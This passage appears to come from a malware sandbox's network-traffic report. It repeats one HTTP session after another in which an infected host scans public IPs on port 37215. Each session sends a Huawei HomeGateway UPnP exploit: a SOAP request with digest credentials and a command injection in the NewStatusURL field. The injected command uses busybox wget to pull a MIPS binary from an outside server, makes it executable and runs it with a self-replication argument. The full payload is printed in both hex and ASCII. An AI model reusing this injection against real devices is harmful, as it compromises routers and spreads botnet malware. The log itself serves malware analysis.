                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          208192.168.2.1548340147.233.247.19637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.555425882 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          209192.168.2.154223241.52.226.22237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.555515051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          210192.168.2.1547854157.89.74.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.556238890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          211192.168.2.1540762194.17.152.8437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.556257963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          212192.168.2.155404841.138.91.21337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.556323051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          213192.168.2.1547884157.48.26.21937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.556457996 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          214192.168.2.1537822197.153.217.9037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.556494951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          215192.168.2.154285657.32.70.13537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.556546926 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          216192.168.2.154435641.147.45.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.556560993 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          217192.168.2.1544740157.202.206.24137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.556613922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
